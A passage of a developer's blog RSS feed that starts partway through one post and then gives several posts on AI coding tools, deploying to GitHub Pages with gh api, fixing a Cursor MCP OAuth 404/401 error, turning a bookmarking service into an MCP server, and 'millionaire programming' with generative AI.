&lt;p&gt;Despite the slight friction of needing a manual click, this &quot;Bring Your Own SaaS&quot; approach fits perfectly for small-scale or personal projects. It is a lightweight feature that significantly enhances how I interact with the information I collect.&lt;/p&gt;
</content:encoded></item><item><title>Building a Digital Toy for Children Without Writing a Single Line of Code</title><link>https://ainoya.dev/posts/building-a-digital-toy-for-children-without-writing-a-single-line-of-code/</link><guid isPermaLink="true">https://ainoya.dev/posts/building-a-digital-toy-for-children-without-writing-a-single-line-of-code/</guid><description>How I used AI to go from an idea to a deployed &apos;Emoji Shower&apos; game, including automated infrastructure setup via GitHub APIs.</description><pubDate>Sun, 15 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I recently created a simple digital toy called Emoji Shower. The concept is straightforward: tapping the screen or hitting keys showers the display with various emojis. It is a sensory, web-based experience designed for young children.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://ainoya.github.io/emoji-shower/&quot;&gt;Demo: Emoji Shower&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The most notable part of this project was the development process. I did not write a single line of code manually. By using AI (Codex), I translated a high-level concept directly into a functional web application.&lt;/p&gt;
&lt;p&gt;The automation extended beyond just the source code. I tasked the AI with handling the infrastructure by using the &lt;code&gt;gh api&lt;/code&gt; command to configure GitHub Pages and manage the deployment process autonomously.&lt;/p&gt;
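&lt;p&gt;I did not record the agent&apos;s exact commands, but the delegated step amounts to something like the following reconstruction. The &lt;code&gt;build_type=workflow&lt;/code&gt; field asks GitHub Pages to build and deploy via GitHub Actions:&lt;/p&gt;

```shell
# Illustrative reconstruction, not a transcript of the agent's session:
# create a GitHub Pages site for the repo, deployed by GitHub Actions.
gh api -X POST repos/ainoya/emoji-shower/pages -f build_type=workflow

# verify the resulting Pages configuration
gh api repos/ainoya/emoji-shower/pages
```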
&lt;p&gt;This experience highlights a shift in technical prototyping. As an engineer, the role transitioned from &quot;builder&quot; to &quot;director.&quot; When the friction of syntax and deployment configuration is removed, the distance between an idea and a tangible result becomes near zero. For a small project like this, this AI-driven approach is becoming the new standard for rapid implementation.&lt;/p&gt;
</content:encoded></item><item><title>The Flow of Invisible Transcription</title><link>https://ainoya.dev/posts/the-flow-of-invisible-transcription/</link><guid isPermaLink="true">https://ainoya.dev/posts/the-flow-of-invisible-transcription/</guid><description>Why hiding real-time transcription can actually make voice input faster and more natural.</description><pubDate>Wed, 04 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I’ve been trying out the voice input feature in Antigravity (specifically testing the UI in version 1.15.8), and it sparked a realization about how we interact with voice UIs.&lt;/p&gt;
&lt;p&gt;Most tools display text in real-time as you speak. While technically impressive, this creates a cognitive burden. As the words appear, your brain involuntarily switches from &quot;speaking&quot; mode to &quot;editing&quot; mode. You start spotting errors or rethinking phrasing mid-sentence, which breaks your train of thought.&lt;/p&gt;
&lt;p&gt;Antigravity behaves differently. It uses a simple recorder UI that hides the transcription process entirely. You speak, and the text generates only after you finish.&lt;/p&gt;
&lt;p&gt;This visual-free approach removes the distraction of immediate self-correction. Because modern AI models are now accurate enough to be trusted without constant supervision, we no longer need to monitor the output in real-time.&lt;/p&gt;
&lt;p&gt;I also suspect a technical upside: by decoupling the UI from the immediate transcription, the system might be free to prioritize capturing the broader context rather than striving for strict, word-for-word accuracy.&lt;/p&gt;
&lt;p&gt;By hiding the visual feedback, the tool allows you to focus entirely on articulating the thought itself, making the drafting process significantly smoother.&lt;/p&gt;
</content:encoded></item><item><title>Fixing &quot;Invalid OAuth error response&quot; When Connecting Cursor to a Custom MCP Server</title><link>https://ainoya.dev/posts/fixing-invalid-oauth-error-response-when-connecting-cursor-to-a-custom-mcp-server/</link><guid isPermaLink="true">https://ainoya.dev/posts/fixing-invalid-oauth-error-response-when-connecting-cursor-to-a-custom-mcp-server/</guid><description>Debugging a cryptic unhandledRejection error in Cursor by adhering to the Model Context Protocol&apos;s authorization spec.</description><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I recently encountered a cryptic error while building a custom &lt;strong&gt;Model Context Protocol (MCP)&lt;/strong&gt; server and attempting to connect it to the Cursor editor.&lt;/p&gt;
&lt;p&gt;Even though I intended to use simple API Key authentication, Cursor threw an &lt;code&gt;unhandledRejection&lt;/code&gt; immediately upon connection. The error message was confusing, seemingly pointing to a syntax issue in a JSON response that I hadn&apos;t explicitly sent.&lt;/p&gt;
&lt;p&gt;Here is what happened, how I debugged it, and why adhering strictly to the MCP authorization specification fixed the issue.&lt;/p&gt;
&lt;h2&gt;The Error&lt;/h2&gt;
&lt;p&gt;When attempting to add my local MCP server to Cursor, the connection failed with the following error output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error (unhandledRejection): HTTP 404: Invalid OAuth error response: SyntaxError: Unexpected non-whitespace character after JSON at position 4 (line 1 column 5). Raw body: 404 Not Found
ServerError: HTTP 404: Invalid OAuth error response: SyntaxError: Unexpected non-whitespace character after JSON at position 4 (line 1 column 5). Raw body: 404 Not Found

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At first glance, the &lt;code&gt;SyntaxError&lt;/code&gt; suggests a malformed JSON response. The &quot;position 4&quot; in the message is the real hint: if the raw body is &lt;code&gt;404 Not Found&lt;/code&gt;, the parser reads &lt;code&gt;404&lt;/code&gt; (a valid JSON number) and then chokes on the space and text that follow.&lt;/p&gt;
&lt;p&gt;This meant Cursor was receiving a plain text &lt;code&gt;404 Not Found&lt;/code&gt; response but was expecting a JSON object.&lt;/p&gt;
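&lt;p&gt;The failure is easy to reproduce in a few lines (a sketch of the parsing behavior, not Cursor&apos;s actual code):&lt;/p&gt;

```typescript
// A JSON parser accepts the leading "404" as a complete number literal,
// then fails on the " Not Found" that follows it.
let message = "";
try {
  JSON.parse("404 Not Found");
} catch (e) {
  message = (e as Error).message;
}
console.log(message);
// On V8-based runtimes, the message points at position 4, matching the
// error Cursor surfaced.
```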
&lt;h2&gt;The Investigation&lt;/h2&gt;
&lt;p&gt;To understand where this 404 was coming from, I checked the access logs of my custom MCP server. I noticed that immediately upon connection, Cursor was making a &lt;code&gt;GET&lt;/code&gt; request to a specific path:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GET /.well-known/oauth-authorization-server

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My server returned a &lt;strong&gt;404 Not Found&lt;/strong&gt; status code because I hadn&apos;t implemented any OAuth endpoints. I was relying solely on API keys passed via headers or environment variables.&lt;/p&gt;
&lt;p&gt;However, Cursor&apos;s MCP client implementation appears to proactively check for OAuth support by probing this standardized endpoint. When it received a 404 text response, its internal logic—likely trying to parse an OAuth error configuration—crashed.&lt;/p&gt;
&lt;h2&gt;The Solution: Return 401, Not 404&lt;/h2&gt;
&lt;p&gt;I consulted the &lt;a href=&quot;https://modelcontextprotocol.io/specification/2025-11-25/basic/authorization&quot;&gt;MCP Authorization Specification&lt;/a&gt; to see how authentication challenges should be handled.&lt;/p&gt;
&lt;p&gt;The specification states:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;MCP clients &lt;strong&gt;MUST&lt;/strong&gt; be able to parse &lt;code&gt;WWW-Authenticate&lt;/code&gt; headers and respond appropriately to &lt;code&gt;HTTP 401 Unauthorized&lt;/code&gt; responses from the MCP server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Although returning 404 for a missing endpoint is standard HTTP, Cursor&apos;s client implementation failed to parse the plain-text response. The MCP specification, by contrast, strictly mandates how clients must handle 401 responses. By returning 401, I forced Cursor into its spec-compliant error-handling flow, effectively bypassing the crash.&lt;/p&gt;
&lt;h3&gt;The Fix&lt;/h3&gt;
&lt;p&gt;I modified my server&apos;s middleware. Instead of letting the request fall through to a generic 404 handler for the &lt;code&gt;.well-known&lt;/code&gt; path, I ensured it returned a &lt;strong&gt;401 Unauthorized&lt;/strong&gt; status code.&lt;/p&gt;
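&lt;p&gt;A minimal sketch of that middleware logic (my illustration; the real server code differs): intercept the discovery path and answer with a 401 challenge instead of letting it fall through to a plain-text 404 handler.&lt;/p&gt;

```typescript
// Route Cursor's OAuth discovery probe to a spec-friendly 401 response.
const OAUTH_DISCOVERY_PATH = "/.well-known/oauth-authorization-server";

type ProbeResponse = { status: number; wwwAuthenticate: string; body: string };

function handleOAuthProbe(path: string): ProbeResponse | null {
  if (path === OAUTH_DISCOVERY_PATH) {
    return {
      status: 401, // MCP clients must handle 401 challenges per the spec
      wwwAuthenticate: 'Bearer realm="mcp"',
      body: JSON.stringify({ error: "unauthorized" }),
    };
  }
  return null; // not the probe: fall through to the normal router
}
```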
&lt;p&gt;Once I deployed this change:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Cursor probed &lt;code&gt;/.well-known/oauth-authorization-server&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;My server returned &lt;code&gt;401 Unauthorized&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Cursor correctly interpreted this as &quot;OAuth not available&quot; or &quot;Authorization required&quot; without crashing on JSON parsing.&lt;/li&gt;
&lt;li&gt;It successfully fell back to using the configured API Key method.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;If you see an &quot;Invalid OAuth error response&quot; in Cursor, check your access logs. You might be returning a 404 where a 401 is expected.&lt;/p&gt;
</content:encoded></item><item><title>Turning My Bookmark Service into a Personal AI Librarian with MCP</title><link>https://ainoya.dev/posts/turning-my-bookmark-service-into-a-personal-ai-librarian-with-mcp/</link><guid isPermaLink="true">https://ainoya.dev/posts/turning-my-bookmark-service-into-a-personal-ai-librarian-with-mcp/</guid><description>How I extended &apos;pokke&apos; with the Model Context Protocol to connect my reading list with my personal knowledge base.</description><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;In a previous post, I introduced &lt;a href=&quot;https://ainoya.dev/posts/pokke-a-small-bookmarking-service-for-my-own-use/&quot;&gt;pokke&lt;/a&gt;, a minimalist bookmarking service I built for my own use. The goal was simple: a place to toss interesting URLs without the friction of heavy, commercial alternatives.&lt;/p&gt;
&lt;p&gt;However, as with any &quot;read later&quot; service, I soon ran into a familiar problem. My collection of bookmarks was growing, but my consumption wasn&apos;t keeping up. It was becoming a graveyard of good intentions—a list of articles I &lt;em&gt;wanted&lt;/em&gt; to read but rarely revisited.&lt;/p&gt;
&lt;p&gt;I realized that simply storing links wasn&apos;t enough. I needed a way to make this information active. I didn&apos;t want to search my bookmarks; I wanted my bookmarks to find &lt;em&gt;me&lt;/em&gt;, and more importantly, I wanted them to connect with the things I was already thinking about.&lt;/p&gt;
&lt;h3&gt;Enter the Model Context Protocol&lt;/h3&gt;
&lt;p&gt;I&apos;ve been experimenting with the &lt;strong&gt;Model Context Protocol (MCP)&lt;/strong&gt;, an open standard that allows AI models to interact with external data and tools. It occurred to me that &lt;code&gt;pokke&lt;/code&gt; shouldn&apos;t just be a database; it should be an MCP server.&lt;/p&gt;
&lt;p&gt;The implementation was surprisingly straightforward. I exposed a &lt;code&gt;/mcp&lt;/code&gt; endpoint on the &lt;code&gt;pokke&lt;/code&gt; API. By doing this, I could plug my custom bookmark service directly into an AI environment (like Claude Desktop) just by adding a simple configuration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &quot;mcpServers&quot;: {
    &quot;pokke-api&quot;: {
      &quot;type&quot;: &quot;http&quot;,
      &quot;url&quot;: &quot;https://api.pokke.femto-cloud.com/mcp&quot;,
      &quot;headers&quot;: {
        &quot;Authorization&quot;: &quot;Bearer ${POKKE_API_KEY}&quot;
      }
    }
  }
}

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This JSON snippet effectively turns my passive database into an active tool that an AI agent can query.&lt;/p&gt;
&lt;h3&gt;Connecting the Dots&lt;/h3&gt;
&lt;p&gt;The real power of this setup isn&apos;t just in summarizing articles—generic AI tools can do that. The goal was to build a bridge between &lt;strong&gt;new information&lt;/strong&gt; (my bookmarks) and &lt;strong&gt;existing context&lt;/strong&gt; (my local knowledge base/notes).&lt;/p&gt;
&lt;p&gt;I created a prompt to act as a &quot;librarian.&quot; I asked the AI to digest my recent bookmarks, categorize them, and—crucially—connect them to topics I have stored in my local file system (my &quot;second brain&quot;).&lt;/p&gt;
&lt;p&gt;Here is the prompt I used:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Use the pokke MCP to summarize the digest of recent pokke bookmark articles.
Divide them by category.
Please indicate what I am interested in and provide suggestions linking them to the knowledge currently in my file system.
Also, include advice on what keywords I should use to deepen my thinking in future intellectual exploration activities.
Write it out to a markdown file named with the date and time.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The result was fascinating. The AI didn&apos;t just tell me what the articles were about; it told me &lt;em&gt;why&lt;/em&gt; they mattered to me.&lt;/p&gt;
&lt;p&gt;For example, when it analyzed an article about &lt;code&gt;uv&lt;/code&gt; (the Python package manager), it didn&apos;t just stop at &quot;it&apos;s fast.&quot; It linked the article to my existing notes on Rust tooling:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://nesbitt.io/2025/12/26/how-uv-got-so-fast.html&quot;&gt;How uv got so fast&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Insight:&lt;/strong&gt; You have an interest in Rust through your study note &lt;code&gt;Implementing Transformer in Rust.md&lt;/code&gt;. The case of &lt;code&gt;uv&lt;/code&gt; suggests that performance comes not just from the language speed but from design and adherence to modern standards. This is a key takeaway for your own tool development.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Similarly, it found a deep connection between a seemingly unrelated article about the &quot;Leftpad&quot; problem and my notes on testing strategies:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://lukeplant.me.uk/blog/posts/breaking-provably-correct-leftpad/&quot;&gt;Breaking “provably correct” Leftpad&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Insight:&lt;/strong&gt; This relates to the discussions in &lt;code&gt;Testing.md&lt;/code&gt; and &lt;code&gt;TestPyramid.md&lt;/code&gt;. The gap between being &quot;according to spec&quot; and &quot;according to user expectation&quot; cannot always be bridged by formal methods alone. Even &quot;provably correct&quot; code can fail in the face of messy realities like Unicode implementation details.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;h3&gt;A Growing Trend&lt;/h3&gt;
&lt;p&gt;I’m not the only one exploring this direction. I recently watched a demonstration by Algolia, &lt;a href=&quot;https://www.youtube.com/watch?v=-4zIqnsQhkU&quot;&gt;Prototype an AI-Powered Bookmark Manager with n8n and Algolia MCP server&lt;/a&gt;, where they used MCP to build a searchable, intelligent bookmark manager. It validates the idea that we are moving away from static lists toward dynamic, AI-assisted knowledge management.&lt;/p&gt;
&lt;p&gt;However, my approach differs slightly in that I am less interested in &lt;em&gt;search&lt;/em&gt; and more interested in &lt;em&gt;synthesis&lt;/em&gt;. I want the AI to act as a catalyst, mixing fresh external inputs with my internal accumulated knowledge to spark new ideas.&lt;/p&gt;
&lt;h3&gt;Closing the Loop&lt;/h3&gt;
&lt;p&gt;The next step is automation. I plan to set up a workflow where this &quot;Digest &amp;amp; Insight&quot; report is generated automatically every week and sent to my Slack.&lt;/p&gt;
&lt;p&gt;Imagine receiving a weekly notification that says: &lt;em&gt;&quot;Here are the articles you saved, here is how they relate to the code you wrote last month, and here are the concepts you should explore next.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;By turning &lt;code&gt;pokke&lt;/code&gt; into an MCP server, it has evolved from a simple storage bin into an active partner in my intellectual life. It’s no longer just about saving URLs; it’s about ensuring that the information I consume actually feeds into my growth as an engineer.&lt;/p&gt;
</content:encoded></item><item><title>Pokke: A small bookmarking service for my own use</title><link>https://ainoya.dev/posts/pokke-a-small-bookmarking-service-for-my-own-use/</link><guid isPermaLink="true">https://ainoya.dev/posts/pokke-a-small-bookmarking-service-for-my-own-use/</guid><description>With Pocket gone, I built a lightweight cloud SaaS to manage my reading list. Here is why I chose to build rather than adopt complex alternatives.</description><pubDate>Sun, 11 Jan 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Like many developers, I relied on Pocket for years to save articles for later reading. When the service shut down in 2025, I was forced to look for a replacement.&lt;/p&gt;
&lt;p&gt;I looked around at the available options—from Obsidian Web Clipper to Notion—but nothing felt quite right. I didn&apos;t want a complex system; I just wanted a simple buffer for my thoughts. So, I decided to build my own solution: &lt;strong&gt;Pokke&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;Why Not Existing Tools?&lt;/h2&gt;
&lt;p&gt;Before building Pokke, I considered two popular alternatives, but neither fit my specific workflow.&lt;/p&gt;
&lt;h3&gt;Obsidian Web Clipper&lt;/h3&gt;
&lt;p&gt;I use Obsidian heavily, and while its web clipper is excellent, I found that clipping everything directly into my vault created too much noise.
My Obsidian vault is for refined, permanent knowledge. Sending every interesting link there made the graph messy and difficult to navigate. I needed a staging area—a place to hold information temporarily before I decided to process it deeply.&lt;/p&gt;
&lt;h3&gt;Notion&lt;/h3&gt;
&lt;p&gt;Notion is undeniably powerful and could easily handle bookmark management. However, I simply don&apos;t use Notion in my daily life.
Adopting a massive, all-in-one workspace just to save a few URLs felt like overkill. I wanted a tool that fit into my existing habits, not one that required me to change them.&lt;/p&gt;
&lt;h2&gt;Introducing Pokke&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://pokke.femto-cloud.com&quot;&gt;Pokke&lt;/a&gt;&lt;/strong&gt; (hosted at &lt;code&gt;pokke.femto-cloud.com&lt;/code&gt;) is a small-scale SaaS I developed to fill this gap.&lt;/p&gt;
&lt;p&gt;The name is a nod to its predecessor, but the philosophy is strictly personal. It is designed to be a quiet space for intellectual inquiry, free from the social features and algorithmic suggestions that have cluttered so many other services.&lt;/p&gt;
&lt;h3&gt;How It Works&lt;/h3&gt;
&lt;p&gt;I kept the architecture and workflow intentionally modest to ensure maintainability.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Capture:&lt;/strong&gt; I built a simple &lt;a href=&quot;https://github.com/ainoya/pokke-chrome-extension&quot;&gt;Chrome Extension&lt;/a&gt; that sends the current URL to my API.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Storage:&lt;/strong&gt; The backend is a lightweight cloud-deployed service that stores the links.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Learning:&lt;/strong&gt; I don&apos;t just let links rot in a list. I access my bookmarks via the API and often use Generative AI to summarize articles or extract key concepts. This helps me efficiently decide what to learn next.&lt;/li&gt;
&lt;/ul&gt;
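&lt;p&gt;As a sketch, the capture step boils down to a small authenticated POST. The endpoint path, payload shape, and auth scheme below are assumptions for illustration, not Pokke&apos;s actual API:&lt;/p&gt;

```typescript
// Build the request the extension would send for the current tab.
// (Hypothetical shape: Pokke's real endpoint and fields may differ.)
function buildSaveRequest(apiKey: string, url: string, title: string) {
  return {
    endpoint: "https://api.pokke.femto-cloud.com/bookmarks",
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      Authorization: "Bearer " + apiKey,
    },
    body: JSON.stringify({ url: url, title: title }),
  };
}
```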
&lt;p&gt;It’s not a groundbreaking platform, but it’s a tool that fits my hand perfectly. Sometimes, that is all you need.&lt;/p&gt;
</content:encoded></item><item><title>The New &quot;Millionaire Programming&quot;: Throwing Generative AI at the Problem</title><link>https://ainoya.dev/posts/the-new-millionaire-programming-throwing-generative-ai-at-the-problem/</link><guid isPermaLink="true">https://ainoya.dev/posts/the-new-millionaire-programming-throwing-generative-ai-at-the-problem/</guid><description>In Japan, we call it &quot;Millionaire Programming.&quot; Traditionally, this meant throwing hardware at performance issues. In the AI era, it means throwing generative cycles at architectural uncertainty.</description><pubDate>Tue, 23 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction: The &quot;Millionaire&quot; Philosophy&lt;/h2&gt;
&lt;p&gt;In the Japanese software engineering community, there is a concept known as &lt;strong&gt;&quot;Millionaire Programming&quot; (富豪的プログラミング).&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The term was originally coined by UI researcher Toshiyuki Masui (known for his work on predictive text input and user interfaces) in his &lt;a href=&quot;http://www.pitecan.com/fugo.html&quot;&gt;essay on utilizing computing resources&lt;/a&gt;. In English, the closest equivalent to his philosophy is the idiom: &lt;strong&gt;&quot;Throwing hardware at the problem.&quot;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Traditionally, this approach prioritized development speed over runtime efficiency. Instead of spending weeks optimizing an algorithm to save 100MB of RAM, a &quot;millionaire&quot; programmer would simply utilize the abundance of modern hardware. We accepted that &quot;hardware is cheap, but programmers are expensive,&quot; and we solved problems by spending machine resources lavishly.&lt;/p&gt;
&lt;p&gt;However, with the advent of the AI era, this concept is undergoing a fundamental transformation.&lt;/p&gt;
&lt;p&gt;We are moving &lt;strong&gt;from throwing hardware resources at performance bottlenecks to throwing code generation effort at architectural uncertainty.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In an age where AI can instantly generate ten different implementation patterns, we have acquired a level of &quot;abundance&quot; that allows us to solve problems by spending generative cycles.&lt;/p&gt;
&lt;h2&gt;Old School: Throwing Hardware at the Problem&lt;/h2&gt;
&lt;p&gt;The traditional &quot;Millionaire&quot; approach was a strategy of substitution.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;graph LR
    A[&quot;Problem: Slow Performance&quot;] --&amp;gt; B[&quot;Option A: Optimize Code (Expensive Human Time)&quot;]
    A --&amp;gt; C[&quot;Option B: Upgrade Server (Cheap Resource)&quot;]
    C --&amp;gt; D[Problem Solved]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We utilized garbage collection, heavy frameworks, and verbose data structures. We didn&apos;t mind if the code was resource-hungry, as long as it was robust and easy to write. We used the &quot;wealth&quot; of Moore&apos;s Law to bypass the &quot;poverty&quot; of human time constraints.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Constraint:&lt;/strong&gt;
Even with this approach, we were limited by &lt;em&gt;human throughput&lt;/em&gt;. We could throw hardware at the code, but we still had to write the code ourselves.&lt;/p&gt;
&lt;h2&gt;New School: Throwing AI at the Problem&lt;/h2&gt;
&lt;p&gt;In the AI era, the definition of &quot;wealth&quot; has changed. We are no longer just resource-rich; we are &lt;strong&gt;generation-rich&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;We can now afford to be &quot;wasteful&quot; with code generation. We can &quot;throw&quot; tokens and inference costs at a problem to explore the solution space.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;graph TD
    A[Problem: Architectural Uncertainty] --&amp;gt; B[AI Parallel Generation]
    B --&amp;gt; C[Throw AI at Idea 1]
    B --&amp;gt; D[Throw AI at Idea 2]
    B --&amp;gt; E[Throw AI at Idea 3]
    C --&amp;gt; F[Comparison &amp;amp; Evaluation]
    D --&amp;gt; F
    E --&amp;gt; F
    F --&amp;gt; G[Selection &amp;amp; Refinement]
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The Shift in Workflow&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;1. Simultaneous Parallel Generation&lt;/strong&gt;
Previously, comparing three different architectural approaches (e.g., &lt;em&gt;Redux&lt;/em&gt; vs. &lt;em&gt;Context API&lt;/em&gt; vs. &lt;em&gt;Zustand&lt;/em&gt;) required significant reading and mental modeling.
Now, I can simply ask an LLM to implement the feature using all three patterns.&lt;/p&gt;
&lt;p&gt;I am &lt;strong&gt;throwing generative cycles&lt;/strong&gt; at my own uncertainty. I can look at the actual code for all three approaches side-by-side before writing a single line of my own. I spend the AI&apos;s &quot;effort&quot; to buy my own &quot;certainty.&quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. The &quot;Disposable Prototype&quot; Pattern&lt;/strong&gt;
In the past, &quot;Fail Fast&quot; was a slogan. Now, &quot;Fail Parallel&quot; is a reality.
I often ask AI to write a quick, dirty script just to validate an idea. If it fails, I discard it immediately. The cost of throwing away code has dropped to near zero because the cost of generating it is near zero.&lt;/p&gt;
&lt;h2&gt;Benefits of Generative Abundance&lt;/h2&gt;
&lt;h3&gt;1. Expanding the Search Space&lt;/h3&gt;
&lt;p&gt;When we write code manually, we tend to stick to what we know (Local Optima). If I know Python well, I&apos;ll solve every problem with Python.
By throwing AI at the problem, I can ask it to generate solutions in languages or paradigms I&apos;m less familiar with. The AI might suggest a Rust-based microservice for a bottleneck I was trying to optimize in Node.js. The &quot;search space&quot; for solutions expands dramatically.&lt;/p&gt;
&lt;h3&gt;2. Deepening Understanding via Comparison&lt;/h3&gt;
&lt;p&gt;The best way to learn a trade-off is to see it.
By generating Option A (High Performance, High Complexity) and Option B (Lower Performance, High Readability) and placing them next to each other, the abstract trade-off becomes concrete. This &quot;rich&quot; comparison process sharpens my architectural intuition.&lt;/p&gt;
&lt;h2&gt;The New Bottleneck: Choice Fatigue&lt;/h2&gt;
&lt;p&gt;However, this new wealth brings a new problem: &lt;strong&gt;Decision Fatigue&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;If traditional Millionaire Programming suffered from &quot;Software Bloat,&quot; AI-based Millionaire Programming suffers from &quot;Choice Overload.&quot; We are faced with a combinatorial explosion of valid options.&lt;/p&gt;
&lt;p&gt;For a single web application, you might instantly be presented with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Next.js deployed on Vercel&lt;/li&gt;
&lt;li&gt;Remix running on Cloudflare Workers&lt;/li&gt;
&lt;li&gt;Astro hosted on Netlify&lt;/li&gt;
&lt;li&gt;Plain React on AWS S3&lt;/li&gt;
&lt;li&gt;...and dozens of other viable combinations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To navigate this, the role of the senior engineer shifts. We are no longer just &quot;builders&quot;; we are &lt;strong&gt;&quot;curators.&quot;&lt;/strong&gt; Our value lies not in how fast we type, but in how effectively we can filter the abundance of generated options to find the one that fits the business constraints.&lt;/p&gt;
&lt;h2&gt;Conclusion: From Craft to Curation&lt;/h2&gt;
&lt;p&gt;&quot;Millionaire Programming&quot; used to be about laziness—letting the hardware do the heavy lifting of memory management.&lt;/p&gt;
&lt;p&gt;Today, it is about &lt;strong&gt;strategy&lt;/strong&gt;. It is about leveraging the infinite patience and speed of AI to explore the map of possibilities before we commit to a path.&lt;/p&gt;
&lt;p&gt;We are &lt;strong&gt;throwing AI at the problem&lt;/strong&gt; to gain something far more valuable: &lt;strong&gt;better decisions.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In this new era, don&apos;t be afraid to be a &quot;millionaire.&quot; Ask for five different implementations. Generate code you intend to throw away. Use this abundance to find the signal in the noise.&lt;/p&gt;
</content:encoded></item><item><title>Antigravity and Jules</title><link>https://ainoya.dev/posts/antigravity-and-jules/</link><guid isPermaLink="true">https://ainoya.dev/posts/antigravity-and-jules/</guid><description>A look at the practical benefits of the Gemini AI Pro coding tools, focusing on Jules&apos; responsiveness and Antigravity&apos;s task queuing model.</description><pubDate>Sat, 20 Dec 2025 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;My original motivation for subscribing to Gemini AI Pro was to access the advanced chat model and the Google Workspace assistance features. However, since the plan also includes usage quotas for &lt;strong&gt;Jules&lt;/strong&gt; and &lt;strong&gt;Antigravity&lt;/strong&gt;, I started experimenting with them to see how they fit into my development process.&lt;/p&gt;
&lt;p&gt;For my daily tasks, these tools have settled into specific niches that improve my workflow, distinct from other web-based coding agents I have used in the past.&lt;/p&gt;
&lt;p&gt;Previously, I used the web interface for Codex. While powerful, I found the web UI to be incredibly heavy, often causing Google Chrome to hang or enter a &quot;waiting&quot; state. It created friction in what should be a quick process.&lt;/p&gt;
&lt;p&gt;In contrast, &lt;strong&gt;Jules&lt;/strong&gt; runs smoothly. The interface is snappy and responsive, which is critical when I want to iterate quickly. It isn&apos;t perfect—it occasionally gets stuck in an infinite loop executing the same command—but for routine tasks like small bug fixes or package updates, it handles the job without the browser lag.&lt;/p&gt;
&lt;p&gt;The standout feature for me, however, is &lt;strong&gt;Antigravity&lt;/strong&gt;, specifically its &quot;Agent Manager&quot; mode.&lt;/p&gt;
&lt;p&gt;Most chat-based AI tools require immediate, synchronous interaction. You type, you wait, you reply. It feels like a conversation that demands your full attention. Antigravity feels different; it is closer to sending an email to a colleague to handle a task in the background.&lt;/p&gt;
&lt;p&gt;I can fire off a request and let it run parallel to my own work. I particularly appreciate two features:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Inline Comments on Plans:&lt;/strong&gt; I can review the agent&apos;s proposed plan and add comments directly in context before execution.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Task Queuing:&lt;/strong&gt; This is the most significant UX improvement. If I think of a task while doing something else, I can explicitly queue it for later execution. It doesn&apos;t force a context switch or interrupt my current &quot;field work.&quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Having these included in my existing subscription has been a welcome addition to my toolkit.&lt;/p&gt;
